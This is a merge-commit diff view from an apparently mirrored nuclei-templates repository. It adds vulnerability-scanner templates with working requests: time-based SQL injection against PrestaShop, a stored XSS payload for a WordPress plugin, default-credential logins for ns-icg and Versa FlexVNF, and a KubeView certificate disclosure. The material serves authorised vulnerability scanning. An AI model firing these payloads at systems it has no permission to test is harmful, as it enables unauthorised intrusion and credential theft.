daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #5 from projectdiscovery/master 

update
patch-1
Hardik Solanki 2022-12-04 16:47:55 +00:00 committed by GitHub
parent cf85ba22ba 6330e4f473
commit ad0067570a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
204 changed files with 4684 additions and 2465 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

28
.new-additions
View File

@ -1,28 +0,0 @@
cves/2012/CVE-2012-0394.yaml
cves/2021/CVE-2021-43421.yaml
cves/2022/CVE-2022-1883.yaml
cves/2022/CVE-2022-1916.yaml
cves/2022/CVE-2022-1933.yaml
cves/2022/CVE-2022-25481.yaml
exposed-panels/exolis-engage-panel.yaml
exposed-panels/fastpanel-hosting-control-panel.yaml
exposed-panels/mach-proweb-login.yaml
exposed-panels/nuxeo-platform-panel.yaml
exposed-panels/pega-web-panel.yaml
exposures/logs/ffserver-status.yaml
misconfiguration/collectd-exporter-metrics.yaml
misconfiguration/installer/oxid-eshop-installer.yaml
misconfiguration/libvirt-exporter-metrics.yaml
misconfiguration/lvm-exporter-metrics.yaml
misconfiguration/mysqld-exporter-metrics.yaml
misconfiguration/namedprocess-exporter-metrics.yaml
misconfiguration/postgres-exporter-metrics.yaml
misconfiguration/rabbitmq-exporter-metrics.yaml
misconfiguration/s3-torrent.yaml
misconfiguration/symfony-fosjrouting-bundle.yaml
technologies/aerocms-detect.yaml
technologies/oracle-httpserver12c.yaml
technologies/payara-micro-server-detect.yaml
token-spray/api-giphy.yaml
vulnerabilities/other/inspur-clusterengine-rce.yaml
vulnerabilities/wordpress/wptouch-xss.yaml

22
README.md
View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
| tech | 357 | princechaddha | 153 | file | 78 | | | | |
**314 directories, 4660 files**.
**321 directories, 4733 files**.
</td>
</tr>

2
TEMPLATES-STATS.json
View File

File diff suppressed because one or more lines are too long

4394
TEMPLATES-STATS.md
View File

File diff suppressed because it is too large Load Diff

20
TOP-10.md
View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 1538 | dhiyaneshdk | 692 | cves | 1516 | info | 1631 | http | 4257 |
| panel | 755 | daffainfo | 662 | exposed-panels | 757 | high | 1141 | file | 78 |
| edb | 578 | pikpikcu | 340 | vulnerabilities | 518 | medium | 829 | network | 73 |
| xss | 537 | pdteam | 274 | misconfiguration | 350 | critical | 546 | dns | 17 |
| exposure | 536 | geeknik | 197 | technologies | 311 | low | 269 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 301 | unknown | 25 | | |
| wordpress | 465 | 0x_akoko | 170 | token-spray | 235 | | | | |
| cve2021 | 366 | pussycat0x | 168 | workflows | 190 | | | | |
| wp-plugin | 360 | ritikchaddha | 161 | default-logins | 114 | | | | |
| tech | 349 | princechaddha | 153 | file | 78 | | | | |
| cve | 1551 | dhiyaneshdk | 701 | cves | 1528 | info | 1666 | http | 4323 |
| panel | 778 | daffainfo | 662 | exposed-panels | 780 | high | 1152 | file | 78 |
| edb | 582 | pikpikcu | 344 | vulnerabilities | 519 | medium | 835 | network | 77 |
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
| xss | 541 | geeknik | 206 | technologies | 319 | low | 281 | | |
| lfi | 519 | dwisiswant0 | 171 | exposures | 308 | unknown | 25 | | |
| wordpress | 470 | pussycat0x | 171 | token-spray | 236 | | | | |
| cve2021 | 369 | 0x_akoko | 170 | workflows | 190 | | | | |
| wp-plugin | 365 | ritikchaddha | 163 | default-logins | 116 | | | | |
| tech | 357 | princechaddha | 153 | file | 78 | | | | |

3
vulnerabilities/other/devalcms-xss.yaml → cves/2008/CVE-2008-6982.yaml
View File

@ -13,10 +13,11 @@ info:
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
cve-id: CVE-2008-6982
cwe-id: CWE-79
metadata:
verified: "true"
tags: devalcms,xss,cms,edb
tags: cve,cve2008,devalcms,xss,cms,edb
requests:
- method: GET

2
cves/2012/CVE-2012-0394.yaml
View File

@ -11,6 +11,8 @@ info:
- https://www.exploit-db.com/exploits/31434
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0394
- http://www.exploit-db.com/exploits/18329
classification:
cve-id: CVE-2012-0394
metadata:
shodan-query: html:"Struts Problem Report"
verified: "true"

2
cves/2016/CVE-2016-10033.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2016-10033
info:
name: WordPress PHPMailer < 5.2.18 Remote Code Execution
name: WordPress PHPMailer < 5.2.18 - Remote Code Execution
author: princechaddha
severity: critical
description: WordPress PHPMailer before 5.2.18 might allow remote attackers to pass extra parameters to the mail command and consequently execute arbitrary code via a " (backslash double quote) in a crafted Sender property in isMail transport.

2
cves/2018/CVE-2018-14912.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2018-14912
info:
name: cgit < 1.2.1 Directory Traversal
name: cgit < 1.2.1 - Directory Traversal
author: 0x_Akoko
severity: high
description: cGit < 1.2.1 via cgit_clone_objects has a directory traversal vulnerability when `enable-http-clone=1` is not turned off, as demonstrated by a cgit/cgit.cgi/git/objects/?path=../ request.

2
cves/2019/CVE-2019-10232.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-10232
info:
name: Teclib GLPI <= 9.3.3 Unauthenticated SQL Injection
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
author: RedTeamBrasil
severity: critical
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature

2
cves/2019/CVE-2019-12314.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-12314
info:
name: Deltek Maconomy 2.2.5 Local File Inclusion
name: Deltek Maconomy 2.2.5 - Local File Inclusion
author: madrobot
severity: critical
description: Deltek Maconomy 2.2.5 is prone to local file inclusion via absolute path traversal in the WS.macx1.W_MCS/ PATH_INFO, as demonstrated by a cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS/etc/passwd URI.

2
cves/2019/CVE-2019-12725.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-12725
info:
name: Zeroshell 3.9.0 Remote Command Execution
name: Zeroshell 3.9.0 - Remote Command Execution
author: dwisiswant0,akincibor
severity: critical
description: Zeroshell 3.9.0 is prone to a remote command execution vulnerability. Specifically, this issue occurs because the web application mishandles a few HTTP parameters. An unauthenticated attacker can exploit this issue by injecting OS commands inside the vulnerable parameters.

2
cves/2019/CVE-2019-13101.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-13101
info:
name: D-Link DIR-600M Authentication Bypass
name: D-Link DIR-600M - Authentication Bypass
author: Suman_Kar
severity: critical
description: D-Link DIR-600M 3.02, 3.03, 3.04, and 3.06 devices can be accessed directly without authentication and lead to disclosure of information about the WAN, which can then be leveraged by an attacker to modify the data fields of the page.

2
cves/2019/CVE-2019-13392.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-13392
info:
name: MindPalette NateMail 3.0.15 Cross-Site Scripting
name: MindPalette NateMail 3.0.15 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: MindPalette NateMail 3.0.15 is susceptible to reflected cross-site scripting which could allows an attacker to execute remote JavaScript in a victim's browser via a specially crafted POST request. The application will reflect the recipient value if it is not in the NateMail recipient array. Note that this array is keyed via integers by default, so any string input will be invalid.

2
cves/2019/CVE-2019-15107.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-15107
info:
name: Webmin <= 1.920 Unauthenticated Remote Command Execution
name: Webmin <= 1.920 - Unauthenticated Remote Command Execution
author: bp0lr
severity: critical
description: Webmin <=1.920. is vulnerable to an unauthenticated remote command execution via the parameter 'old' in password_change.cgi.

2
cves/2019/CVE-2019-16313.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-16313
info:
name: ifw8 Router ROM v4.31 Credential Discovery
name: ifw8 Router ROM v4.31 - Credential Discovery
author: pikpikcu
severity: high
description: ifw8 Router ROM v4.31 is vulnerable to credential disclosure via action/usermanager.htm HTML source code.

2
cves/2019/CVE-2019-16662.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2019-16662
info:
name: rConfig 3.9.2 Remote Code Execution
name: rConfig 3.9.2 - Remote Code Execution
author: pikpikcu
severity: critical
description: rConfig 3.9.2 is susceptible to a remote code execution vulnerability. An attacker can directly execute system commands by sending a GET request to ajaxServerSettingsChk.php because the rootUname parameter is passed to the exec function without filtering, which can lead to command execution.

2
cves/2020/CVE-2020-10546.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-10546
info:
name: rConfig 3.9.4 SQL Injection
name: rConfig 3.9.4 - SQL Injection
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions have unauthenticated compliancepolicies.inc.php SQL injection. Because nodes' passwords are stored in cleartext by default, this vulnerability leads to lateral movement,

2
cves/2020/CVE-2020-10547.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-10547
info:
name: rConfig 3.9.4 SQL Injection
name: rConfig 3.9.4 - SQL Injection
author: madrobot
severity: critical
description: rConfig 3.9.4 and previous versions has unauthenticated compliancepolicyelements.inc.php SQL injection. Because nodes' passwords are stored by default in cleartext, this vulnerability leads to lateral movement, granting an attacker access to monitored network devices.

2
cves/2020/CVE-2020-11991.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-11991
info:
name: Apache Cocoon 2.1.12 XML Injection
name: Apache Cocoon 2.1.12 - XML Injection
author: pikpikcu
severity: high
description: Apache Cocoon 2.1.12 is susceptible to XML injection. When using the StreamGenerator, the code parses a user-provided XML. A specially crafted XML, including external system entities, can be used to access any file on the server system.

2
cves/2020/CVE-2020-13700.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-13700
info:
name: WordPresss acf-to-rest-api <=3.1.0- Insecure Direct Object Reference
name: WordPresss acf-to-rest-api <=3.1.0 - Insecure Direct Object Reference
author: pikpikcu
severity: high
description: |

2
cves/2020/CVE-2020-13937.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-13937
info:
name: Apache Kylin Exposed Configuration File
name: Apache Kylin - Exposed Configuration File
author: pikpikcu
severity: medium
description: Apache Kylin 2.0.0, 2.1.0, 2.2.0, 2.3.0, 2.3.1, 2.3.2, 2.4.0, 2.4.1, 2.5.0, 2.5.1, 2.5.2, 2.6.0, 2.6.1, 2.6.2, 2.6.3, 2.6.4, 2.6.5, 2.6.6, 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0, 3.0.1, 3.0.2, 3.1.0, 4.0.0-alpha have one REST API which exposed Kylin's configuration information without authentication.

2
cves/2020/CVE-2020-25213.yaml
View File

@ -4,7 +4,7 @@ id: CVE-2020-25213
# http://localhost/wp-content/plugins/wp-file-manager/lib/files/poc.txt
info:
name: WordPress File Manager Plugin Remote Code Execution
name: WordPress File Manager Plugin - Remote Code Execution
author: foulenzer
severity: critical
description: The WordPress File Manager plugin prior to version 6.9 is susceptible to remote code execution. The vulnerability allows unauthenticated remote attackers to upload .php files.

2
cves/2020/CVE-2020-25223.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-25223
info:
name: Sophos UTM Preauth Remote Code Execution
name: Sophos UTM Preauth - Remote Code Execution
author: gy741
severity: critical
description: Sophos SG UTMA WebAdmin is susceptible to a remote code execution vulnerability in versions before v9.705 MR5, v9.607 MR7, and v9.511 MR11.

2
cves/2020/CVE-2020-25506.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-25506
info:
name: D-Link DNS-320 Unauthenticated Remote Code Execution
name: D-Link DNS-320 - Unauthenticated Remote Code Execution
author: gy741
severity: critical
description: D-Link DNS-320 FW v2.06B01 Revision Ax is susceptible to a command injection vulnerability in a system_mgr.cgi component. The component does not successfully sanitize the value of the HTTP parameters f_ntp_server, which in turn leads to arbitrary command execution.

2
cves/2020/CVE-2020-2551.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-2551
info:
name: Oracle WebLogic Server Remote Code Execution
name: Oracle WebLogic Server - Remote Code Execution
author: dwisiswant0
severity: critical
description: |

37
cves/2020/CVE-2020-26248.yaml Normal file
View File

@ -0,0 +1,37 @@
id: CVE-2020-26248
info:
name: PrestaShop ProductComments < 4.2.0 - SQL Injection
author: edoardottt
severity: high
description: |
In the PrestaShop module "productcomments" before version 4.2.1, an attacker can use a Blind SQL injection to retrieve data or stop the MySQL service. The problem is fixed in 4.2.1 of the module.
reference:
- https://packetstormsecurity.com/files/160539/PrestaShop-ProductComments-4.2.0-SQL-Injection.html
- https://nvd.nist.gov/vuln/detail/CVE-2020-26248
- https://packagist.org/packages/prestashop/productcomments
- https://github.com/PrestaShop/productcomments/security/advisories/GHSA-5v44-7647-xfw9
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:H
cvss-score: 8.2
cve-id: CVE-2020-26248
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2020,sqli,prestshop,packetstorm
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products%5B%5D=(select*from(select(sleep(6)))a) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and

2
cves/2020/CVE-2020-35729.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35729
info:
name: Klog Server <=2.41- Unauthenticated Command Injection
name: Klog Server <=2.41 - Unauthenticated Command Injection
author: dwisiswant0
severity: critical
description: Klog Server 2.4.1 and prior is susceptible to an unauthenticated command injection vulnerability. The `authenticate.php` file uses the `user` HTTP POST parameter in a call to the `shell_exec()` PHP function without appropriate input validation, allowing arbitrary command execution as the apache user. The sudo configuration permits the Apache user to execute any command as root without providing a password, resulting in privileged command execution as root. Originated from Metasploit module, copyright (c) space-r7.

2
cves/2020/CVE-2020-35846.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35846
info:
name: Agentejo Cockpit < 0.11.2 NoSQL Injection
name: Agentejo Cockpit < 0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php check function. The $eq operator matches documents where the value of a field equals the specified value.

2
cves/2020/CVE-2020-35847.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2020-35847
info:
name: Agentejo Cockpit <0.11.2 NoSQL Injection
name: Agentejo Cockpit <0.11.2 - NoSQL Injection
author: dwisiswant0
severity: critical
description: Agentejo Cockpit before 0.11.2 allows NoSQL injection via the Controller/Auth.php resetpassword function of the Auth controller.

2
cves/2021/CVE-2021-20114.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-20114
info:
name: TCExam <= 14.8.1 Sensitive Information Exposure
name: TCExam <= 14.8.1 - Sensitive Information Exposure
author: push4d
severity: high
description: When installed following the default/recommended settings, TCExam <= 14.8.1 allowed unauthenticated users to access the /cache/backup/ directory, which includes sensitive database backup files.

35
cves/2021/CVE-2021-3110.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2021-3110
info:
name: PrestaShop 1.7.7.0 SQL Injection
author: Jaimin Gondaliya
severity: critical
description: |
The store system in PrestaShop 1.7.7.0 allows time-based boolean SQL injection via the module=productcomments controller=CommentGrade id_products[] parameter.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-3110
- https://medium.com/@gondaliyajaimin797/cve-2021-3110-75a24943ca5e
- https://www.exploit-db.com/exploits/49410
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-3110
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2021,sqli,prestshop,edb
requests:
- raw:
- |
@timeout: 20s
GET /index.php?fc=module&module=productcomments&controller=CommentGrade&id_products[]=1%20AND%20(SELECT%203875%20FROM%20(SELECT(SLEEP(6)))xoOt) HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'status_code == 200'
- 'contains(content_type, "application/json")'
- 'contains(body, "average_grade")'
condition: and

2
cves/2021/CVE-2021-31682.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-31682
info:
name: WebCTRL OEM <= 6.5 Cross-Site Scripting
name: WebCTRL OEM <= 6.5 - Cross-Site Scripting
author: gy741,dhiyaneshDk
severity: medium
description: WebCTRL OEM 6.5 and prior is susceptible to a cross-site scripting vulnerability because the login portal does not sanitize the operatorlocale GET parameter.

4
cves/2021/CVE-2021-35587.yaml
View File

@ -16,8 +16,10 @@ info:
cve-id: CVE-2021-35587
cwe-id: CWE-502
metadata:
verified: true
fofa-query: body="/oam/pages/css/login_page.css"
tags: cve,cve2021,oam,rce,java,unauth,oracle
shodan-query: http.title:"Oracle Access Management"
tags: cve,cve2021,oam,rce,java,unauth,oracle,kev
requests:
- method: GET

2
cves/2021/CVE-2021-38751.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-38751
info:
name: ExponentCMS <= 2.6 Host Header Injection
name: ExponentCMS <= 2.6 - Host Header Injection
author: dwisiswant0
severity: medium
description: An HTTP Host header attack exists in ExponentCMS 2.6 and below in /exponent_constants.php. A modified HTTP header can change links on the webpage to an arbitrary value,leading to a possible attack

2
cves/2021/CVE-2021-40438.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-40438
info:
name: Apache <= 2.4.48 Mod_Proxy SSRF
name: Apache <= 2.4.48 - Mod_Proxy SSRF
author: pdteam
severity: critical
description: Apache 2.4.48 and below contain an issue where uri-path can cause mod_proxy to forward the request to an origin server chosen by the remote user.

2
cves/2021/CVE-2021-41174.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-41174
info:
name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
name: Grafana 8.0.0 <= v.8.2.2 - Angularjs Rendering Cross-Site Scripting
author: pdteam
severity: medium
description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.

6
cves/2021/CVE-2021-43421.yaml
View File

@ -9,10 +9,14 @@ info:
reference:
- https://github.com/Studio-42/elFinder/issues/3429
- https://nvd.nist.gov/vuln/detail/CVE-2021-43421
- https://twitter.com/infosec_90/status/1455180286354919425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-43421
cwe-id: CWE-434
metadata:
verified: true
verified: "true"
tags: cve,cve2021,elfinder,upload,rce,intrusive
requests:

2
cves/2021/CVE-2021-43778.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-43778
info:
name: GLPI plugin Barcode < 2.6.1 Path Traversal Vulnerability.
name: GLPI plugin Barcode < 2.6.1 - Path Traversal Vulnerability.
author: cckuailong
severity: high
description: Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.

2
cves/2021/CVE-2021-45232.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2021-45232
info:
name: Apache APISIX Dashboard <2.10.1 API Unauthorized Access
name: Apache APISIX Dashboard <2.10.1 - API Unauthorized Access
author: Mr-xn
severity: critical
description: In Apache APISIX Dashboard before 2.10.1, the Manager API uses two frameworks and introduces framework `droplet` on the basis of framework `gin.' While all APIs and authentication middleware are developed based on framework `droplet`, some API directly use the interface of framework `gin` thus bypassing their authentication.

48
cves/2022/CVE-2022-2034.yaml Normal file
View File

@ -0,0 +1,48 @@
id: CVE-2022-2034
info:
name: Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure
author: imhunterand
severity: medium
description: |
The Sensei LMS WordPress plugin before 4.5.0 does not have proper permissions set in one of its REST endpoint, allowing unauthenticated users to access private messages sent to teachers
reference:
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
- https://hackerone.com/reports/1590237
- https://wordpress.org/plugins/sensei-lms/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2034
cwe-id: CWE-862
metadata:
verified: "true"
tags: wp,disclosure,wpscan,cve,cve2022,sensei-lms,fuzz,hackerone,wordpress,wp-plugin
requests:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
payloads:
num: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sensei_message'
- 'guid":{"rendered":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200

2
cves/2022/CVE-2022-23131.yaml
View File

@ -2,7 +2,7 @@ id: CVE-2022-23131
info:
name: Zabbix - SAML SSO Authentication Bypass
author: For3stCo1d
author: For3stCo1d,spac3wh1te
severity: critical
description: When SAML SSO authentication is enabled (non-default), session data can be modified by a malicious actor because a user login stored in the session was not verified.
reference:

2
cves/2022/CVE-2022-25323.yaml
View File

@ -1,7 +1,7 @@
id: CVE-2022-25323
info:
name: ZEROF Web Server 2.0 Cross-Site Scripting
name: ZEROF Web Server 2.0 - Cross-Site Scripting
author: pikpikcu
severity: medium
description: ZEROF Web Server 2.0 allows /admin.back cross-site scripting.

64
cves/2022/CVE-2022-3506.yaml Normal file
View File

@ -0,0 +1,64 @@
id: CVE-2022-3506
info:
name: WordPress Related Posts <= 2.1.2 - Cross-Site Scripting
author: arafatansari
severity: medium
description: |
The Related Posts for WordPress plugin is vulnerable to stored XSS, specifically in the rp4wp[heading_text] parameter because the user input is not properly sanitized, allowing the insertion of JavaScript code that can exploit the vulnerability.
reference:
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828/
- https://huntr.dev/bounties/08251542-88f6-4264-9074-a89984034828
- https://github.com/barrykooij/related-posts-for-wp/commit/37733398dd88863fc0bdb3d6d378598429fd0b81
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.4
cve-id: CVE-2022-3506
cwe-id: CWE-79
metadata:
verified: "true"
tags: wordpress,wp,wp-plugin,relatedposts,cve,cve2022,xss,authenticated,huntr
requests:
- raw:
- |
POST /wp-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
log={{username}}&pwd={{password}}&wp-submit=Log+In
- |
GET /wp-admin/options-general.php?page=rp4wp HTTP/1.1
Host: {{Hostname}}
- |
POST /wp-admin/options.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
option_page=rp4wp&action=update&_wpnonce={{nonce}}&_wp_http_referer=%2Fwp-admin%2Foptions-general.php%3Fpage%3Drp4wp&rp4wp%5Bautomatic_linking%5D=1&rp4wp%5Bautomatic_linking_post_amount%5D=3&rp4wp%5Bheading_text%5D=%22+autofocus+onfocus%3Dalert%28document.domain%29%3E&rp4wp%5Bexcerpt_length%5D=15&rp4wp%5Bcss%5D=.rp4wp-related-posts+ul%7Bwidth%3A100%25%3Bpadding%3A0%3Bmargin%3A0%3Bfloat%3Aleft%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%7Blist-style%3Anone%3Bpadding%3A0%3Bmargin%3A0%3Bpadding-bottom%3A20px%3Bclear%3Aboth%3B%7D%0D%0A.rp4wp-related-posts+ul%3Eli%3Ep%7Bmargin%3A0%3Bpadding%3A0%3B%7D%0D%0A.rp4wp-related-post-image%7Bwidth%3A35%25%3Bpadding-right%3A25px%3B-moz-box-sizing%3Aborder-box%3B-webkit-box-sizing%3Aborder-box%3Bbox-sizing%3Aborder-box%3Bfloat%3Aleft%3B%7D
- |
GET /wp-admin/options-general.php?page=rp4wp&settings-updated=true HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- "contains(all_headers_4, 'text/html')"
- "status_code_4 == 200"
- 'contains(body_4, "value=\"\" autofocus onfocus=alert(document.domain)>")'
- "contains(body_4, 'The amount of automatically')"
condition: and
extractors:
- type: regex
name: nonce
part: body
group: 1
regex:
- 'name="_wpnonce" value="([0-9a-z]+)" />'
internal: true

39
cves/2022/CVE-2022-45933.yaml Normal file
View File

@ -0,0 +1,39 @@
id: CVE-2022-45933
info:
name: KubeView - Information disclosure
author: For3stCo1d
severity: critical
description: |
KubeView through 0.1.31 allows attackers to obtain control of a Kubernetes cluster because api/scrape/kube-system does not require authentication, and retrieves certificate files that can be used for authentication as kube-admin. NOTE: the vendor's position is that KubeView was a "fun side project and a learning exercise," and not "very secure."
reference:
- https://github.com/benc-uk/kubeview/issues/95
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45933
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-45933
cwe-id: CWE-287
metadata:
shodan-query: http.title:"KubeView"
verified: "true"
tags: cve,cve2022,kubeview,kubernetes,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/api/scrape/kube-system"
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'BEGIN CERTIFICATE'
- 'END CERTIFICATE'
- 'kubernetes.io'
condition: and
- type: status
status:
- 200

48
default-logins/nsicg/nsicg-default-login.yaml Normal file
View File

@ -0,0 +1,48 @@
id: nsicg-default-login
info:
name: Ns-icg Default Login
author: pikpikcu
severity: high
description: |
There is a weak password vulnerability in NetentSec Internet Control Gateway ns-icg of Beijing NetentScience and Technology Co., Ltd., which allows attackers to successfully log in to the system and obtain sensitive information by exploiting this loophole.
reference: |
- https://www.cnvd.org.cn/flaw/show/CNVD-2016-08603
metadata:
verified: true
fofa-query: "NS-ICG"
tags: nsicg,default-login
requests:
- raw:
- |
@timeout: 25s
POST /user/login/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
usrname={{username}}&pass={{password}}&signinfo=&ukey_user_flag=0&SlotSerialNumber=&agree=
- |
@timeout: 25s
GET /user/main HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}/user/login/
attack: pitchfork
payloads:
username:
- ns25000
password:
- ns25000
cookie-reuse: true
req-condition: true
matchers:
- type: dsl
dsl:
- 'contains(all_headers_1, "/user/main/")'
- 'status_code_1 == 302'
- 'status_code_2 == 200'
- contains(body_2, "var loguser = \'ns25000")
condition: and

57
default-logins/versa/versa-flexvnf-default-login.yaml Normal file
View File

@ -0,0 +1,57 @@
id: versa-flexvnf-default-login
info:
name: Versa FlexVNF Web-UI - Default Login
author: c-sh0
severity: high
reference:
- https://versa-networks.com/products/
metadata:
verified: true
shodan-query: title:"Flex VNF Web-UI"
tags: default-login,versa,flexvnf
requests:
- raw:
- |
GET /authenticate HTTP/1.1
Host: {{Hostname}}
- |
POST /authenticate HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
CSRF-Token: {{xsrf_token}}
{"username":"{{username}}","password":"{{password}}"}
attack: pitchfork
payloads:
username:
- versa
- admin
password:
- versa123
- versa123
cookie-reuse: true
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "{\"username\":\"{{username}}\",\"error\":false}"
- type: status
status:
- 200
extractors:
- type: regex
name: xsrf_token
group: 1
internal: true
part: header
regex:
